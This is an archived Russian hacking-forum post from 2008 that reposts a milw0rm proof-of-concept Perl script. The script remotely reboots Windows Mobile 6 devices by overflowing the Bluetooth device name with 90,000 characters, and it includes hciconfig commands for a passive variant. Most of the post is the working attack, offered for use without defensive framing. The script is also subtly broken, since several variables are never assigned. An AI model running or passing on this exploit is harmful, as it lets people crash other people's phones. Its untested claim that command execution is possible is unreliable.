1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

WM 6.0 Device long name Remote Reboot Exploit

Тема в разделе "Гаджеты и фичи", создана пользователем Mari00, 27 сен 2008.

  1. Mari00

    Mari00 Модератор

    1 ноя 2006
    Windows Mobile 6.0 Device long name Remote Reboot Exploit

    # ----------WM6 remote overflow reboot PoC----------
    # Simple exploit for remote rebooting a windows mobile device
    # Maybe we can use it for doing command execution,
    # I've not test it since the device is rebooting and do not dump a core
    # for further analysing.
    # The bug is not realy in the long string name but when it's the first
    # time the wm6 device try to get a connection with too long name. 
    # There's two way to exploit this bug, this PoC show the first method 
    # (direct connect to the device if we know the bdaddr) but you can
    # just wait for the device to search and overflow by itself when
    # seeing the hci name:
    # hciconfig <hci dev> name `perl -e 'print "A"x90000'`
    # hciconfig <hci dev> piscan
    # You just have to wait until the wm device search for bluetooth devices
    # in range and it will be overflowed
    #  *Tested on WM6 fully patched  on [HTC wiza 200],[HTC Mda 8125]
    # (by Julien Bedard)
    use Net::Bluetooth;
    $overflow="A" x 90000;
    if (@ARGV < 2)
    die "Usage:\n       ./wm6_dos.pl <target_mac> <hci_device>\n\n";
    # change this lame cmd ???
    system("hciconfig $hci_dev name $overflow");
    $over_conn = Net::Bluetooth->newsocket("RFCOMM");
    print "socket error $!\n" unless(defined($over_conn));
    $over_conn->connect($target, $rfcomm_port);
    # milw0rm.com [2008-09-26]

Поделиться этой страницей